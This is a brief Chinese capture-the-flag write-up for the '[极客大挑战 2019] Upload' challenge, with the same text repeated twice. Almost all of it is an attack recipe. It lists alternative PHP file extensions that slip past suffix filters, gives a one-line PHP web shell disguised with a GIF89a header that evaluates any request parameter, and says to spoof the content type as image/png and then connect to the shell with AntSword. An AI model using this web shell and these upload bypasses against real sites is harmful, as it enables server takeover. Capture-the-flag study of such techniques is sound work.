[极客大挑战 2019] Upload
1:某些情况下绕过后缀名检测:
php,php3,php4,php5,phtml.pht
2:常用一句话:
GIF89a? <script language="php">eval($_REQUEST[1])</script>
php5 适用
3:文件类型绕过
改成 image/png
上传之后蚁剑连接即可
[极客大挑战 2019] Upload
1:某些情况下绕过后缀名检测:
php,php3,php4,php5,phtml.pht
2:常用一句话:
GIF89a? <script language="php">eval($_REQUEST[1])</script>
php5 适用
3:文件类型绕过
改成 image/png
上传之后蚁剑连接即可